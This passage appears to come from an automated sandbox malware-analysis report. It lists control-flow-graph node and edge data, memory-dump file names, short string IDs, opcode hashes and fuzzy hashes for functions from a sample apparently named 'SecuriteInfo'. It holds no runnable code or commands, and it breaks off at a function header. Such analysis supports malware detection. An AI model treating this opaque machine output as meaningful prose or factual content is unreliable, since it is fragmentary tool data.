                                                                                                                                                                                                                  control_flow_graph 602 deea90-deeaf1 607 deeafd-deeb11 602->607 608 deeaf3-deeaf7 602->608 610 deeb1f-deeb2a 607->610 608->607 612 deeb13-deeb16 610->612 612->610 613 deeb18 612->613 613->610 614 deeebe-deeed9 call de0198 613->614 615 deeb5c-deeb6f 613->615 616 deebfb-deec12 613->616 617 deeedb-deeee6 613->617 618 deec17 613->618 619 deed94-deedad 613->619 620 deeb55-deeb5a 613->620 621 deeb71-deeb8c 613->621 622 deeb8e-deeb90 613->622 623 deed6e-deed80 613->623 624 deeb2c-deeb41 613->624 625 deeee8-deeeeb 613->625 626 deebe2-deebf6 613->626 627 deed82-deed92 613->627 628 deeb43-deeb53 613->628 629 deeba0-deeba3 613->629 630 deeea5-deeea8 614->630 615->612 616->612 617->630 631 deec18-deec1b 618->631 646 deedaf-deedb1 619->646 647 deedb3 619->647 620->612 621->612 622->631 632 deeb96-deeb9b 622->632 654 deed47-deed4a 623->654 624->612 699 deeeee call def288 625->699 700 deeeee call def278 625->700 626->612 627->654 628->612 633 deef4d-deef5a 629->633 634 deeba9-deebbc 629->634 649 deeeaa 630->649 650 deeeb1-deeebc 630->650 631->629 645 deec1d-deec6c call de0188 631->645 632->612 634->633 640 deebc2-deebce 634->640 639 deeef4-deeeff 639->630 640->633 653 deebd4-deebdd 640->653 675 deec6e-deec72 645->675 676 deec78-deece7 645->676 656 deedb8-deedba 646->656 647->656 649->614 649->617 649->625 649->650 657 deef33-deef4c 649->657 650->630 653->612 660 deed3c 654->660 661 deed4c 654->661 664 deedbc 656->664 665 deedc5 656->665 660->654 661->614 661->617 661->619 661->623 661->625 661->627 661->657 666 deed53-deed67 661->666 664->665 665->630 666->623 675->676 685 deecfe-deed11 676->685 686 deece9-deecfc 676->686 692 deed1a 685->692 693 deed13-deed18 685->693 689 deed33 686->689 697 deed33 call def050 689->697 698 deed33 call def041 689->698 691 deed39 691->660 694 deed1c-deed1e 692->694 693->694 694->666 695 deed20-deed31 694->695 695->689 697->691 698->691 699->639 700->639
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: @$TJiq$TJiq$Tedq
                                                                                                                                                                                                                  • API String ID: 0-3841639335
                                                                                                                                                                                                                  • Opcode ID: a04a9318cf73ad170541ab7bf75dd1af3256b285c103174fe01a936091a1dae4
                                                                                                                                                                                                                  • Instruction ID: cc7c043ef18f564cbfa491a08a8b0a5e747cd17fd9fad927753cc5758c2126a0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a04a9318cf73ad170541ab7bf75dd1af3256b285c103174fe01a936091a1dae4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1C13A74B042549FDB14EFAAD894B6DBBB2EF88710F258069E406DB3A1CB30DD45CB61
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C1C08 Relevance: 5.2, Strings: 4, Instructions: 204COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 701 13c1c08-13c1c3c 705 13c1cb8-13c1cc0 701->705 706 13c1c43-13c1c46 705->706 707 13c1c66-13c1c6b 706->707 708 13c1c4d-13c1c56 707->708 709 13c1c5f-13c1c64 708->709 710 13c1c58 708->710 709->708 710->705 710->706 710->707 710->709 711 13c1d1c-13c1d43 710->711 712 13c1c3e-13c1c41 710->712 713 13c1c98-13c1ca0 710->713 714 13c1cd4-13c1d17 710->714 715 13c1c6d-13c1c75 710->715 716 13c1c48-13c1c4b 710->716 717 13c1d48-13c1d4d 710->717 718 13c1c82-13c1c88 710->718 719 13c1ca2-13c1ca8 710->719 720 13c1cc2-13c1cc4 710->720 711->712 712->713 713->716 714->712 721 13c1c7e-13c1c80 715->721 722 13c1c77 715->722 716->709 729 13c1d51-13c1d53 717->729 723 13c1c8a 718->723 724 13c1c91-13c1c96 718->724 725 13c1caa 719->725 726 13c1cb1-13c1cb6 719->726 727 13c1d4f 720->727 728 13c1cca-13c1ccf 720->728 721->708 721->718 722->705 722->706 722->711 722->712 722->713 722->714 722->717 722->718 722->719 722->720 723->705 723->711 723->712 723->713 723->714 723->717 723->719 723->720 724->713 724->716 725->705 725->711 725->714 725->717 725->720 726->705 726->706 727->729 728->712 732 13c1d55-13c1d75 729->732 733 13c1d77-13c1dce 729->733 732->733 749 13c1de6-13c1e1b 733->749 750 13c1dd0-13c1dd6 733->750 757 13c1e23-13c1e75 749->757 751 13c1dd8 750->751 752 13c1dda-13c1ddc 750->752 751->749 752->749 763 13c1e8d-13c1e94 757->763 764 13c1e77-13c1e7d 757->764 765 13c1e7f 764->765 766 13c1e81-13c1e83 764->766 765->763 766->763
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: d%jq$d%jq$$dq$$dq
                                                                                                                                                                                                                  • API String ID: 0-1704398804
                                                                                                                                                                                                                  • Opcode ID: 319662c0c2e0015726e76c990dcea553ae5d0b1879b489ae01a61d3d2c86fcfc
                                                                                                                                                                                                                  • Instruction ID: b122b2b5d041cb2c91e2396c9d9b79048e882c94fe6aa1136ff8b28f5566fd58
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 319662c0c2e0015726e76c990dcea553ae5d0b1879b489ae01a61d3d2c86fcfc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51512430B04218CBDB58AA79885173B66DBEBC9B14F25846EE50ADB3D6DE31DC0163E1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C1BF8 Relevance: 5.2, Strings: 4, Instructions: 198COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 767 13c1bf8-13c1c3c 772 13c1cb8-13c1cc0 767->772 773 13c1c43-13c1c46 772->773 774 13c1c66-13c1c6b 773->774 775 13c1c4d-13c1c56 774->775 776 13c1c5f-13c1c64 775->776 777 13c1c58 775->777 776->775 777->772 777->773 777->774 777->776 778 13c1d1c-13c1d43 777->778 779 13c1c3e-13c1c41 777->779 780 13c1c98-13c1ca0 777->780 781 13c1cd4-13c1d17 777->781 782 13c1c6d-13c1c75 777->782 783 13c1c48-13c1c4b 777->783 784 13c1d48-13c1d4d 777->784 785 13c1c82-13c1c88 777->785 786 13c1ca2-13c1ca8 777->786 787 13c1cc2-13c1cc4 777->787 778->779 779->780 780->783 781->779 788 13c1c7e-13c1c80 782->788 789 13c1c77 782->789 783->776 796 13c1d51-13c1d53 784->796 790 13c1c8a 785->790 791 13c1c91-13c1c96 785->791 792 13c1caa 786->792 793 13c1cb1-13c1cb6 786->793 794 13c1d4f 787->794 795 13c1cca-13c1ccf 787->795 788->775 788->785 789->772 789->773 789->778 789->779 789->780 789->781 789->784 789->785 789->786 789->787 790->772 790->778 790->779 790->780 790->781 790->784 790->786 790->787 791->780 791->783 792->772 792->778 792->781 792->784 792->787 793->772 793->773 794->796 795->779 799 13c1d55-13c1d75 796->799 800 13c1d77-13c1dce 796->800 799->800 816 13c1de6-13c1e1b 800->816 817 13c1dd0-13c1dd6 800->817 824 13c1e23-13c1e75 816->824 818 13c1dd8 817->818 819 13c1dda-13c1ddc 817->819 818->816 819->816 830 13c1e8d-13c1e94 824->830 831 13c1e77-13c1e7d 824->831 832 13c1e7f 831->832 833 13c1e81-13c1e83 831->833 832->830 833->830
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 2$d%jq$d%jq$$dq
                                                                                                                                                                                                                  • API String ID: 0-4072387185
                                                                                                                                                                                                                  • Opcode ID: bed38a6e1dc47c60667353f3f57ce5ea73d319e73f5277ba22ff3f049b8462ad
                                                                                                                                                                                                                  • Instruction ID: 5cbcd7711d3f493126ef93023b78ada798dee1d1774fd7eaed6e2a256c616806
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bed38a6e1dc47c60667353f3f57ce5ea73d319e73f5277ba22ff3f049b8462ad
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2513530B00218CBDB18AA79885073B7ADBEF89B14F15816EE50ADB3D2DE31DC0193E1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013CD138 Relevance: 4.2, Strings: 3, Instructions: 479COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 834 13cd138-13cd160 836 13cd1ae-13cd1bc 834->836 837 13cd162-13cd1a9 834->837 838 13cd1be-13cd1c9 call 13caf28 836->838 839 13cd1cb 836->839 887 13cd605-13cd60c 837->887 841 13cd1cd-13cd1d4 838->841 839->841 844 13cd2bd-13cd2c1 841->844 845 13cd1da-13cd1de 841->845 849 13cd317-13cd321 844->849 850 13cd2c3-13cd2d2 call 13c9268 844->850 846 13cd60d-13cd635 845->846 847 13cd1e4-13cd1e8 845->847 857 13cd63c-13cd666 846->857 851 13cd1fa-13cd258 call 13cac68 call 13cb6d0 847->851 852 13cd1ea-13cd1f4 847->852 853 13cd35a-13cd380 849->853 854 13cd323-13cd332 call 13c87d8 849->854 865 13cd2d6-13cd2db 850->865 894 13cd25e-13cd2b8 851->894 895 13cd6cb-13cd6f5 851->895 852->851 852->857 877 13cd38d 853->877 878 13cd382-13cd38b 853->878 871 13cd66e-13cd684 854->871 872 13cd338-13cd355 854->872 857->871 866 13cd2dd-13cd312 call 13ccc00 865->866 867 13cd2d4 865->867 866->887 867->865 897 13cd68c-13cd6c4 871->897 872->887 885 13cd38f-13cd3b7 877->885 878->885 902 13cd3bd-13cd3d6 885->902 903 13cd488-13cd48c 885->903 894->887 904 13cd6ff-13cd705 895->904 905 13cd6f7-13cd6fd 895->905 897->895 902->903 925 13cd3dc-13cd3eb call 13c8200 902->925 906 13cd48e-13cd4a7 903->906 907 13cd506-13cd510 903->907 905->904 909 13cd706-13cd743 905->909 906->907 934 13cd4a9-13cd4b8 call 13c8200 906->934 911 13cd56d-13cd576 907->911 912 13cd512-13cd51c 907->912 914 13cd5ae-13cd5fb 911->914 915 13cd578-13cd5a6 call 13ca460 call 13ca480 911->915 923 13cd51e-13cd520 912->923 924 13cd522-13cd534 912->924 941 13cd603 914->941 915->914 929 13cd536-13cd538 923->929 924->929 943 13cd3ed-13cd3f3 925->943 944 13cd403-13cd418 925->944 939 13cd53a-13cd53e 929->939 940 13cd566-13cd56b 929->940 951 13cd4ba-13cd4c0 934->951 952 13cd4d0-13cd4db 934->952 946 13cd55c-13cd561 call 13c7000 939->946 947 13cd540-13cd559 939->947 940->911 940->912 941->887 953 13cd3f5 943->953 954 13cd3f7-13cd3f9 943->954 957 13cd44c-13cd455 944->957 958 13cd41a-13cd446 call 13c96b0 944->958 946->940 947->946 960 13cd4c4-13cd4c6 951->960 961 13cd4c2 951->961 952->895 962 13cd4e1-13cd504 952->962 953->944 954->944 957->895 959 13cd45b-13cd482 957->959 958->897 958->957 959->903 959->925 960->952 961->952 962->907 962->934
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: Hhq$Hhq$Hhq
                                                                                                                                                                                                                  • API String ID: 0-327223379
                                                                                                                                                                                                                  • Opcode ID: fc1478698b49d14d36b324734a341a39b40eaacd31e99d39340c0ac1ba0195ad
                                                                                                                                                                                                                  • Instruction ID: ac617fa489263fe6ce863bfba11c41c60ea1bf1713262a117f7047d099f1c107
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc1478698b49d14d36b324734a341a39b40eaacd31e99d39340c0ac1ba0195ad
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9127E31A002049FCB25DFA8D484AAEB7F6FF88704F14856DE50A9B795DB35EC46CB90
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013CEDE8 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 976 13cede8-13cee25 978 13cee47-13cee5d call 13cebf0 976->978 979 13cee27-13cee2a 976->979 985 13cf1d3-13cf1e7 978->985 986 13cee63-13cee6f 978->986 1089 13cee2c call 13cf758 979->1089 1090 13cee2c call 13cf6f0 979->1090 981 13cee32-13cee34 981->978 983 13cee36-13cee3e 981->983 983->978 993 13cf227-13cf230 985->993 987 13cee75-13cee78 986->987 988 13cefa0-13cefa7 986->988 991 13cee7b-13cee84 987->991 989 13cefad-13cefb6 988->989 990 13cf0d6-13cf1ca call 13ce5f8 * 2 988->990 989->990 994 13cefbc-13cf0c8 call 13ce5f8 call 13ceb88 call 13ce5f8 989->994 990->985 996 13cf2c8 991->996 997 13cee8a-13cee9e 991->997 998 13cf1f5-13cf1fe 993->998 999 13cf232-13cf239 993->999 1087 13cf0ca 994->1087 1088 13cf0d3 994->1088 1006 13cf2cd-13cf2d1 996->1006 1007 13ceea4-13cef39 call 13cebf0 * 2 call 13ce5f8 call 13ceb88 call 13cec30 call 13cecd8 call 13ced40 997->1007 1008 13cef90-13cef9a 997->1008 998->996 1002 13cf204-13cf216 998->1002 1004 13cf23b-13cf27e call 13ce5f8 999->1004 1005 13cf287-13cf28e 999->1005 1022 13cf218-13cf21d 1002->1022 1023 13cf226 1002->1023 1004->1005 1009 13cf290-13cf2a0 1005->1009 1010 13cf2b3-13cf2c6 1005->1010 1013 13cf2dc 1006->1013 1014 13cf2d3 1006->1014 1066 13cef58-13cef8b call 13ced40 1007->1066 1067 13cef3b-13cef53 call 13cecd8 call 13ce5f8 call 13ce8a8 1007->1067 1008->988 1008->991 1009->1010 1026 13cf2a2-13cf2aa 1009->1026 1010->1006 1021 13cf2dd 1013->1021 1014->1013 1021->1021 1091 13cf220 call 5131910 1022->1091 1092 13cf220 call 5131900 1022->1092 1023->993 1026->1010 1066->1008 1067->1066 1087->1088 1088->990 1089->981 1090->981 1091->1023 1092->1023
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 4'dq$4'dq$4'dq
                                                                                                                                                                                                                  • API String ID: 0-2431816566
                                                                                                                                                                                                                  • Opcode ID: 4ad150213c5f64de8561f807277f85585e21a7884a0ed3bd1bf092c1956a30c1
                                                                                                                                                                                                                  • Instruction ID: 2b4976eaa0d4ac8fa0225232ed70ea9d16f87e9574d1d9f6b32e595de250e7bc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ad150213c5f64de8561f807277f85585e21a7884a0ed3bd1bf092c1956a30c1
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2F1EF34B00219DFDB14DFA8D994A9DBBB6FF89704F118168E905AB3A5DB31EC42CB50
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DEC1B0 Relevance: 3.8, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1093 dec1b0-dec254 1106 dec25f-dec267 1093->1106 1107 dec272-dec2c2 1106->1107
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: fiq$ fiq$4'dq
                                                                                                                                                                                                                  • API String ID: 0-1687476495
                                                                                                                                                                                                                  • Opcode ID: 19d8bbe5cf74246ce574e49c5353e1c6aa657587c9b21444322908e1828ce514
                                                                                                                                                                                                                  • Instruction ID: 3226163144a9e4597820f7a3293d071d62899f05d652b4e6ee20922cd06c6c99
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19d8bbe5cf74246ce574e49c5353e1c6aa657587c9b21444322908e1828ce514
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23312F3090121ADFCB04EFA9D9506AEBBB6FF89301B10456DE415EB394DB355E05CFA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00DEC1C0 Relevance: 3.8, Strings: 3, Instructions: 68COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1113 dec1c0-dec267 1126 dec272-dec2c2 1113->1126
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2052577370.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: fiq$ fiq$4'dq
                                                                                                                                                                                                                  • API String ID: 0-1687476495
                                                                                                                                                                                                                  • Opcode ID: 347e9c9f235c2df4aff90d0bc78308bd6a34be918fd101fe489a2f7d4703b27a
                                                                                                                                                                                                                  • Instruction ID: 72d2fb6b064ee7396e1367367bde22c254af0f4984002f37ea29d21e6d251ac5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 347e9c9f235c2df4aff90d0bc78308bd6a34be918fd101fe489a2f7d4703b27a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2211C70A0021ADFCB08EFA9D5505AEB7B6FB88301F20452DE415E7398DB355E45CFA1
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013C9949 Relevance: 3.0, Strings: 2, Instructions: 484COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1519 13c9949-13c9984 1521 13c998d-13c9992 call 13c96e8 1519->1521 1522 13c9986 1519->1522 1524 13c9997-13c99a0 1521->1524 1522->1521 1525 13c9ae4-13c9aeb 1524->1525 1526 13c99a6-13c99b9 1524->1526 1527 13c9d85-13c9d8c 1525->1527 1528 13c9af1-13c9b06 1525->1528 1533 13c99bb-13c99c2 1526->1533 1534 13c99c7-13c99e1 1526->1534 1529 13c9d8e-13c9d97 1527->1529 1530 13c9dfb-13c9e02 1527->1530 1539 13c9b08-13c9b0a 1528->1539 1540 13c9b26-13c9b2c 1528->1540 1529->1530 1532 13c9d99-13c9dac 1529->1532 1535 13c9e9e-13c9ea5 1530->1535 1536 13c9e08-13c9e11 1530->1536 1532->1530 1554 13c9dae-13c9df3 call 13c6a30 1532->1554 1543 13c9add 1533->1543 1557 13c99e8-13c99f5 1534->1557 1558 13c99e3-13c99e6 1534->1558 1541 13c9ea7-13c9eb8 1535->1541 1542 13c9ec1-13c9ec7 1535->1542 1536->1535 1538 13c9e17-13c9e2a 1536->1538 1560 13c9e2c-13c9e3b 1538->1560 1561 13c9e3d-13c9e41 1538->1561 1539->1540 1544 13c9b0c-13c9b23 1539->1544 1545 13c9bf4-13c9bf8 1540->1545 1546 13c9b32-13c9b34 1540->1546 1541->1542 1563 13c9eba 1541->1563 1548 13c9ed9-13c9ee2 1542->1548 1549 13c9ec9-13c9ecf 1542->1549 1543->1525 1544->1540 1545->1527 1559 13c9bfe-13c9c00 1545->1559 1546->1545 1553 13c9b3a-13c9bbb call 13c6a30 * 4 1546->1553 1555 13c9ee5-13c9f5a 1549->1555 1556 13c9ed1-13c9ed7 1549->1556 1626 13c9bbd-13c9bcf call 13c6a30 1553->1626 1627 13c9bd2-13c9bf1 call 13c6a30 1553->1627 1554->1530 1596 13c9df5-13c9df8 1554->1596 1633 13c9f5c-13c9f66 1555->1633 1634 13c9f68 1555->1634 1556->1548 1556->1555 1564 13c99f7-13c9a0b 1557->1564 1558->1564 1559->1527 1565 13c9c06-13c9c0f 1559->1565 1560->1561 1567 13c9e61-13c9e63 1561->1567 1568 13c9e43-13c9e45 1561->1568 1563->1542 1564->1543 1589 13c9a11-13c9a65 1564->1589 1572 13c9d62-13c9d68 1565->1572 1567->1535 1575 13c9e65-13c9e6b 1567->1575 1568->1567 1574 13c9e47-13c9e5e 1568->1574 1577 13c9d6a-13c9d79 1572->1577 1578 13c9d7b 1572->1578 1574->1567 1575->1535 1583 13c9e6d-13c9e9b 1575->1583 1579 13c9d7d-13c9d7f 1577->1579 1578->1579 1579->1527 1585 13c9c14-13c9c22 call 13c8200 1579->1585 1583->1535 1598 13c9c3a-13c9c54 1585->1598 1599 13c9c24-13c9c2a 1585->1599 1637 13c9a67-13c9a69 1589->1637 1638 13c9a73-13c9a77 1589->1638 1596->1530 1598->1572 1611 13c9c5a-13c9c5e 1598->1611 1604 13c9c2c 1599->1604 1605 13c9c2e-13c9c30 1599->1605 1604->1598 1605->1598 1614 13c9c7f 1611->1614 1615 13c9c60-13c9c69 1611->1615 1620 13c9c82-13c9c9c 1614->1620 1618 13c9c6b-13c9c6e 1615->1618 1619 13c9c70-13c9c73 1615->1619 1623 13c9c7d 1618->1623 1619->1623 1620->1572 1640 13c9ca2-13c9d23 call 13c6a30 * 4 1620->1640 1623->1620 1626->1627 1627->1545 1641 13c9f6d-13c9f6f 1633->1641 1634->1641 1637->1638 1638->1543 1639 13c9a79-13c9a91 1638->1639 1639->1543 1647 13c9a93-13c9a9f 1639->1647 1667 13c9d3a-13c9d60 call 13c6a30 1640->1667 1668 13c9d25-13c9d37 call 13c6a30 1640->1668 1642 13c9f76-13c9f7b 1641->1642 1643 13c9f71-13c9f74 1641->1643 1646 13c9f81-13c9fae 1642->1646 1643->1646 1648 13c9aae-13c9ab4 1647->1648 1649 13c9aa1-13c9aa4 1647->1649 1652 13c9abc-13c9ac5 1648->1652 1653 13c9ab6-13c9ab9 1648->1653 1649->1648 1655 13c9ad4-13c9ada 1652->1655 1656 13c9ac7-13c9aca 1652->1656 1653->1652 1655->1543 1656->1655 1667->1527 1667->1572 1668->1667
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053072126.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_13c0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: $dq$$dq
                                                                                                                                                                                                                  • API String ID: 0-2340669324
                                                                                                                                                                                                                  • Opcode ID: 449d09d738593da162084c7147d8d835fab6bc704d5c8b24e9d31f163a41c990
                                                                                                                                                                                                                  • Instruction ID: 505064ea36dc7c5e9c7b96dc5e94d504b37c990945682a94aa6801d28a03ad90
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 449d09d738593da162084c7147d8d835fab6bc704d5c8b24e9d31f163a41c990
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C128C75A002298FDF15DFA9C884BADBBB5FF88708F158418E902A7399DB349D46CF50
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 02AD0078 Relevance: 2.9, Strings: 2, Instructions: 365COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2053166177.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2ad0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: 4'dq$4'dq
                                                                                                                                                                                                                  • API String ID: 0-2306408947
                                                                                                                                                                                                                  • Opcode ID: 13960375a22faf15e09241a3d755435e7f5b547ab25a8a8ef4b5dbfab87ee096
                                                                                                                                                                                                                  • Instruction ID: e3ebac5769f71adc64d429d4b2e42d2bcec56b17f8753c9c783fe3740fde462f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13960375a22faf15e09241a3d755435e7f5b547ab25a8a8ef4b5dbfab87ee096
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5B1D2B1B042258BCF341B7959D973EA5EAABC8B55F15442EEA0BC7344EF20CC45C7A2
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 013CC7E8 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
